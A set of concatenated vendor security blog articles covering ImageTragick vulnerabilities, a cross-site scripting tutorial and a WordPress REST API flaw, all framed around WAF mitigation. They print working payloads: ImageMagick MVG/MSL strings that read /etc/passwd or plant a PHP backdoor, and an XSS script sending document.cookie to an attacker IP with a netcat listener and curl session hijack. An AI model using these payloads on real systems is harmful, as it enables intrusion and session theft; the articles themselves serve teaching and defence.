CVE-2016-3715 – Delete file CVE-2016-3716 – File moving CVE-2016-3717 – Local File Read The “EPHEMERAL” coder could be abused to delete files from the server just by providing a file name, as it deletes the file after reading it. Example : image over 0,0 0,0 'ephemeral://critical.file' The “label” instruction of the MVG coder could be abused to read the content of an arbitrary file on the server. Example : image over 0,0 0,0 'label:@/etc/passwd' However, CVE-2016-3716 is even more interesting application abuse use case as, just by using the “read” and “write” directives of the MSL coder an attacker could potentially compromise a remote server. In the full attack scenario, attacker will upload an “image” file containing PHP code with a valid image extension, say “image.gif”. <?php phpinfo(); //Show all information, defaults to INFO_ALL ?> <!-- image.gif that will be renamed to backdoor.php --> The next step will be uploading an MSL file with the “read” directive which will read the content of the previously uploaded “image” file and also with the “write” directive which will write this content to a web accessible directive while renaming the file to have a PHP extension to make it executable. Example: <?xml version="1.0" encoding="UTF-8"?>  <!-- script.msl --!> Finally, the attacker will upload another MVG file that will execute previously uploaded MSL file using the “msl” pseudo protocol. Example: image over 0,0 0,0 'msl:/files/script.msl' This example uses the 'phpinfo()' function in the PHP backdoor file, as a simple indication that the exploit worked, however attacker can replace this command with a webshell such as described in our previous posts. Server Side Request Forgery Same “url” directive used in the MVG/SVG format could be also abused to cause the server send HTTP or FTP requests for example to another server inside the server’s internal network that could not be accessible from the outside world, by providing a URL with an IP address of the internal network. This vulnerability is tracked as CVE-2016-3718. Mitigation It is possible to protect against the ImageTragick vulnerabilities using Big-IP ASM. Using WAF for “virtually patching” the application could be even critical as a protection tool especially before the patch for the backend code is available or has been deployed. Although the “Shell Command Execution” vulnerabilities are 0-day vulnerabilities, meaning previously unknown attack vector, the post-exploitation has the same pattern, attempting to smuggle and execute operation system commands on the attacked server and will be mitigated by the existing “Command Execution” attack signatures. For instance, signature ID 200003041 (“ls” execution attempt) will spot an attacker who is trying to smuggle the “ls –la” system command while exploiting CVE-2016-3714. We have also released Attack Signature Update to detect and mitigate the specific ImageMagick application abuse and server side request forgery vulnerabilities. It is recommended to patch the vulnerabilities in the code and follow some basic remediation steps: Consider disabling the unsafe coders Consult the ImageMagick recommendation: http://www.imagemagick.org/discourse-server/viewtopic.php?t=29588 Webserver should run with the lowest permissions Always patch the systems4.8KViews0likes0CommentsImageTragick - The Tragick continues
Abstract We keep talking about the fact that ASM is an effective tool for protecting the 0-day attacks. Two years ago we were able to detect the shellshock exploitations attempts by detecting the carried commands that the shellshock was used to execute. More details are here: Mitigating the Unknown. ImageMagick ImageMagick, a very popular image editing library, has a new vulnerability which allows a code execution abusing an incorrectly parsed file format. We already wrote about ImageMagick in June because there were multiple CVEs about mishandling the MVG and SVG file formats, allowing abuse of ImageMagick based software to create and delete files, move them, and run commands, only by abusing incomplete input validation in ImageMagick’s file format. Sometime after the original CVEs another CVE showed up, allowing another attacker to execute an arbitrary shell command using the pipe character (“|”) at the start of the processed filename. CVE-2016-5118 CVE ID for the new vulnerability is CVE-2016-5118andjust like the earlier CVE-2016-3714, it may allow the attacker to remotely smuggle and run shell commands on the server. Luckily for us, ASM is great with mitigating the 0-day shell and code execution vectors and, therefore, nothing had to be reconfigured to keep our server safe from this attack. In this particular example, ASM has detected using 3 ASM signatures: echo sig_id 200003045, cat sig_id 200003065 /usr sig_id 200003060 Conclusion I believe that we have not seen the last CVE for the ImageMagick based software but ASM should be able to detect and block the exploitation attempts for the vulnerabilities that were already discovered and those which are yet to come. We will continue to follow the issue and update the signatures when needed.360Views0likes0CommentsCross Site Scripting (XSS) Exploit Paths
Introduction Web application threats continue to cause serious security issues for large corporations and small businesses alike. In 2016, even the smallest, local family businesses have a Web presence, and it is important to understand the potential attack surface in any web-facing asset, in order to properly understand vulnerabilities, exploitability, and thus risk. The Open Web Application Security Project (OWASP) is a non-profit organization dedicated to ensuring the safety and security of web application software, and periodically releases a Top 10 list of common categories of web application security flaws. The current list is available at https://www.owasp.org/index.php/Top_10_2013-Top_10 (an updated list for 2016/2017 is currently in data call announcement), and is used by application developers, security professionals, software vendors and IT managers as a reference point for understanding the nature of web application security vulnerabilities. This article presents a detailed analysis of the OWASP security flaw A3: Cross-Site Scripting (XSS), including descriptions of the three broad types of XSS and possibilities for exploitation. Cross Site Scripting (XSS) Cross-Site Scripting (XSS) attacks are a type of web application injection attack in which malicious script is delivered to a client browser using the vulnerable web app as an intermediary. The general effect is that the client browser is tricked into performing actions not intended by the web application. The classic example of an XSS attack is to force the victim browser to throw an ‘XSS!’ or ‘Alert!’ popup, but actual exploitation can result in the theft of cookies or confidential data, download of malware, etc. Persistent XSS Persistent (or Stored) XSS refers to a condition where the malicious script can be stored persistently on the vulnerable system, such as in the form of a message board post. Any victim browsing the page containing the XSS script is an exploit target. This is a very serious vulnerability as a public stored XSS vulnerability could result in many thousands of cookies stolen, drive-by malware downloads, etc. As a proof-of-concept for cookie theft on a simple message board application, consider the following: Here is our freshly-installed message board application. Users can post comments, admins can access the admin panel. Let’s use the typical POC exercise to validate that the message board is vulnerable to XSS: Sure enough, it is: Just throwing a dialog box is kinda boring, so let’s do something more interesting. I’m going to inject a persistent XSS script that will steal the cookies of anyone browsing the vulnerable page: Now I start a listener on my attacking box, this can be as simple as netcat, but can be any webserver of your choosing (python simpleHTTPserver is another nice option). dsyme@kylie:~$ sudo nc -nvlp 81 And wait for someone – hopefully the site admin – to browse the page. The admin has logged in and browsed the page. Now, my listener catches the HTTP callout from my malicious script: And I have my stolen cookie PHPSESSID=lrft6d834uqtflqtqh5l56a5m4 . Now I can use an intercepting proxy or cookie manager to impersonate admin. Using Burp: Or, using Cookie Manager for Firefox: Now I’m logged into the admin page: Access to a web application CMS is pretty close to pwn. From here I can persist my access by creating additional admin accounts (noisy), or upload a shell (web/php reverse) to get shell access to the victim server. Bear in mind that using such techniques we could easily host malware on our webserver, and every victim visiting the page with stored XSS would get a drive-by download. Non-Persistent XSS Non-persistent (or reflected) XSS refers to a slightly different condition in which the malicious content (script) is immediately returned by a web application, be it through an error message, search result, or some other means that echoes some part of the request back to the client. Due to their nonpersistent nature, the malicious code is not stored on the vulnerable webserver, and hence it is generally necessary to trick a victim into opening a malicious link in order to exploit a reflected XSS vulnerability. We’ll use our good friend DVWA (Damn Vulnerable Web App) for this example. First, we’ll validate that it is indeed vulnerable to a reflected XSS attack: It is. Note that this can be POC’d by using the web form, or directly inserting code into the ‘name’ parameter in the URL. Let’s make sure we can capture a cookie using the similar manner as before. Start a netcat listener on 192.168.178.136:81 (and yes, we could use a full-featured webserver for this to harvest many cookies), and inject the following into the ‘name’ parameter: <SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT> We have a cookie, PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2 . Let’s see if we can use it to login from the command line without using a browser: $ curl -b "security=low;PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2" --location "http://192.168.178.140/dvwa/" > login.html $ dsyme@kylie:~$ egrep Username login.html <div align="left"><em>Username:</em> admin<br /><em>Security Level:</em> low<br /><em>PHPIDS:</em> disabled</div> Indeed we can. Now, of course, we just stole our own cookie here. In a real attack we’d be wanting to steal the cookie of the actual site admin, and to do that, we’d need to trick him or her into clicking the following link: http://192.168.178.140/dvwa/vulnerabilities/xss_r/?name=victim<SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT> Or, easily enough to put into an HTML message like this. And now we need to get our victim to click the link. A spear phishing attack might be a good way. And again, we start our listener and wait. Of course, instead of stealing admin’s cookies, we could host malware on a webserver somewhere, and distribute the malicious URL by phishing campaign, host on a compromised website, distribute through Adware (there are many possibilities), and wait for drive-by downloads. The malicious links are often obfuscated using a URL-shortening service. DOM-Based XSS DOM-based XSS is an XSS attack in which the malicious payload is executed as a result of modification of the Document Object Model (DOM) environment of the victim browser. A key differentiator between DOM-based and traditional XSS attacks is that in DOM-based attacks the malicious code is not sent in the HTTP response from server to client. In some cases, suspicious activity may be detected in HTTP requests, but in many cases no malicious content is ever sent to or from the webserver. Usually, a DOM-based XSS vulnerability is introduced by poor input validation on a client-side script. A very nice demo of DOM-based XSS is presented at https://xss-doc.appspot.com/demo/3. Here, the URL Fragment (the portion of the URL after #, which is never sent to the server) serve as input to a client-side script – in this instance, telling the browser which tab to display: Unfortunately, the URL fragment data is passed to the client-side script in an unsafe fashion. Viewing the source of the above webpage, line 8 shows the following function definition: And line 33: In this case we can pass a string to the URL fragment that we know will cause the function to error, e.g. “foo”, and set an error condition. Reproducing the example from the above URL with full credit to the author, it is possible to inject code into the error condition causing an alert dialog: Which could be modified in a similar fashion to steal cookies etc. And of course we could deface the site by injecting an image of our choosing from an external source: There are other possible vectors for DOM-based XSS attacks, such as: Unsanitized URL or POST body parameters that are passed to the server but do not modify the HTTP response, but are stored in the DOM to be used as input to the client-side script. An example is given at https://www.owasp.org/index.php/DOM_Based_XSS Interception of the HTTP response to include additional malicious scripts (or modify existing scripts) for the client browser to execute. This could be done with a Man-in-the-Browser attack (malicious browser extensions), malware, or response-side interception using a web proxy. Like reflected XSS, exploitation is often accomplished by fooling a user into clicking a malicious link. DOM-based XSS is typically a client-side attack. The only circumstances under which server-side web-based defences (such as mod_security, IDS/IPS or WAF) are able to prevent DOM-based XSS is if the malicious script is sent from client to server, which is not usually the case for DOM-based XSS. As many more web applications utilize client-side components (such as sending periodic AJAX calls for updates), DOM-based XSS vulnerabilities are on the increase – an estimated 10% of the Alexa top 10k domains contained DOM-based XSS vulnerabilities according to Ben Stock, Sebastian Lekies and Martin Johns (https://www.blackhat.com/docs/asia-15/materials/asia-15-Johns-Client-Side-Protection-Against-DOM-Based-XSS-Done-Right-(tm).pdf). Preventing XSS XSS vulnerabilities exist due to a lack of input validation, whether on the client or server side. Secure coding practices, regular code review, and white-box penetration testing are the best ways to prevent XSS in a web application, by tackling the problem at source. OWASP has a detailed list of rules for XSS prevention documented at https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet. There are many other resources online on the topic. However, for many (most?) businesses, it may not be possible to conduct code reviews or commit development effort to fixing vulnerabilities identified in penetration tests. In most cases, XSS can be easily prevented by the deployment of Web Application Firewalls. Typical mechanisms for XSS-prevention with a WAF are: Alerting on known XSS attack signatures Prevention of input of <script> tags to the application unless specifically allowed (rare) Prevention of input of < ,> characters in web forms Multiple URL decoding to prevent bypass attempts using encoding Enforcement of value types in HTTP parameters Blocking non-alphanumeric characters where they are not permitted Typical IPS appliances lack the HTTP intelligence to be able to provide the same level of protection as a WAF. For example, while an IPS may block the <script> tag (if it is correctly configured to intercept SSL), it may not be able to handle the URL decoding required to catch obfuscated attacks. F5 Silverline is a cloud-based WAF solution and provides native and quick protection against XSS attacks. This can be an excellent solution for deployed production applications that include XSS vulnerabilities, because modifying the application code to remove the vulnerability can be time-consuming and resource-intensive. Full details of blocked attacks (true positives) can be viewed in the Silverline portal, enabling application and network administrators to extract key data in order to profile attackers: Similarly, time-based histograms can be displayed providing details of blocked XSS campaigns over time. Here, we can see that a serious XSS attack was prevented by Silverline WAF on September 1 st : F5 Application Security Manager (ASM) can provide a similar level of protection in an on-premise capacity. It is of course highly recommended that any preventive controls be tested – which typically means running an automated vulnerability scan (good) or manual penetration test (better) against the application once the control is in place. As noted in the previous section, do not expect web-based defences such as a WAF to protect against DOM-based XSS as most attack vectors do no actually send any malicious traffic to the server.12KViews1like0CommentsWordPress REST API Vulnerability: Violating Security’s Rule Zero
It's an API economy. If you don't have an API you're already behind. APIs are the fuel driving organizations' digital transformation. We've all heard something similar to these phrases in the past few years. And while they look like marketing, they taste like truth. Because APIs really are transforming organizations and have taken hold as the de facto method of integration - internally, externally, laterally, and vertically. APIs enable mobile apps and things, web apps and middleware to communicate, collaborate, and extricate digital gold (that's data, by the way). So when there’s a vulnerability discovered in an API, it turns heads. Especially if it’s a vulnerability that is easily exploitable (this one is) and affects a significant number of publicly accessible resources (it does). #WordPress REST API vulnerability is already abused in defacement campaigns https://t.co/5i9pYKW4tH by @danielcid If you’re running WordPress versions 4.7.0 or 4.7.1 you are vulnerable. Stop reading this and go patch it right now. If you can’t for some reason and you’ve got a BIG-IP ASM you can apply these rules right now to protect vulnerable sites. I’m not kidding. I’ll wait right here. Okay, now that we’ve got that out of the way, I want to talk about APIs and security for a moment because there seems to be some general misunderstandings about REST APIs and security that this vulnerability just happens to illustrate perfectly. HTTP: The Foundation on which REST APIs are Built REST stands for Representational State Transfer. Don’t worry too much about what that means, because what you really need to understand is that it’s an architectural style. If you were going to list it along with other methods of achieving the same thing (transfer of data between two endpoints) you might list: RPC, CORBA, and SOAP. A REST API call is an HTTP request where the URI endpoint is typically indistinguishable from a web URI. The request looks the same. Really, which of these two URIs is a call to an API: GET /w/thing/snowmobile/id GET /a/thing/snowmobile/id See what I mean? No difference from outside. There’s no standard out there that requires a REST API contain some identifying attribute or HTTP header that makes it different than a traditional web request. The Content-Type suggested by the JSON specification is application/json but like the Pirate Code, those are more guidelines than actual rules. Thus, one cannot rely solely on Content-Type to identify a REST API from a standard HTTP request. In fact, good old x-www-form-urlencoded is often used to invoke API calls from clients. For example, here’s an HTTP request to an Express-based API I’m working on (for fun, cause I still do that) using Postman: GET /api/user/1 HTTP/1.1 Host: 192.168.0.57:8080 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Postman-Token: 6d2247a1-9923-4774-6b86-7ba334bd497e And here’s one that does a POST, to send data to the API endpoint: POST /api/login HTTP/1.1 Host: 192.168.0.57:8080 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Postman-Token: 32a29369-5d9d-6952-7de6-8aa4782d694d name=Webmistress&passwd=xxxx Now, these are API calls. And I’m betting that you noticed a couple of things: The REST API uses HTTP verbs like GET, POST, PUT, and DELETE. The URI is – and hold on to your hats now – a standard HTTP URI. The Content-Type does not help us determine whether this is a request to an API or a traditional web app. These first two points are really important because it’s this basic foundation that lets us breathe (a little) easier when it comes to securing APIs. Because we already know a whole lot about HTTP and the myriad ways in which it can be exploited. REST has become the de facto standard for communication because it’s far simpler than its predecessors and it relies solely on well-understood protocols and platforms, primarily HTTP. Building a REST API, then, means using HTTP to define a set of interfaces through which mobile apps, things, and web apps will communicate. These interfaces, in aggregate, comprise an API. And basically, they’re a set of URI endpoints invoked via HTTP and executed on by a server-side application*. The fact that the architectural design is REST, and it’s an API, is irrelevant. The same code could have been written to support a traditional web-based system, because the problem isn’t with the API or REST, it’s with the code that’s processing the input provided. The WordPress vulnerability is not a vulnerability in its API, per se, but in the way the API implementation handles standard, well-understood HTTP mechanisms. API implementations are often accomplished via frameworks (like Express, can you tell I’m a fan?) that take the tedium out of splitting apart the URI and distilling the paths into “routes” that are then used to call the appropriate function. In addition, this code is responsible for grabbing the query parameters (everything that comes after the ? in a URI, including the key-value pairs) and stuffing them into variables that can be used to do things like update databases, retrieve forum posts, and insert new content into the system. In this case, the back-end code for the API improperly handles those variables (including some poorly considered authorization logic), failing to properly validate and sanitize it. In Dungeons and Dragons we have the concept of “Rule Zero” and it comes before every other rule out there. It is foundational. There is a similar Rule Zero in security, and it is this: THOU SHALT NOT TRUST USER INPUT. EVER. It is Rule Zero that has been violated and thus introduces this vulnerability to WordPress. Now, you can certainly dig into the details and walk through the code (I like the type-casting logic that really makes this vulnerability work and the lazy sanitization attempt) but the point here is that REST API security relies a lot on the same, well-understood WEB security long preached by OWASP and every other security vendor out there. In fact, one could say it starts with strong, basic web security, the foundation of which is built upon rule zero. Yes, there are other concerns with APIs with respect to security, and REST introduces some of them because it eschews state. That means it requires a more active or external means of authentication and authorization. And many security folks are still getting up to speed on JSON, as are many of the security services inserted into the data path between endpoints that inspect, scan, and scrub app layer data. But if you’re trying to figure out where to start securing APIs, one of the best places is back to the beginning by laying down a strong set of secure coding practices that begins with Security’s Rule Zero. * Increasingly server-side applications are microservices and in the case of APIs, serverless (Function as a Service) is also gaining traction. And still they rely on endpoint invocation via an HTTP URI. Just sayin. The more things change, the more the stay the same.376Views0likes0Comments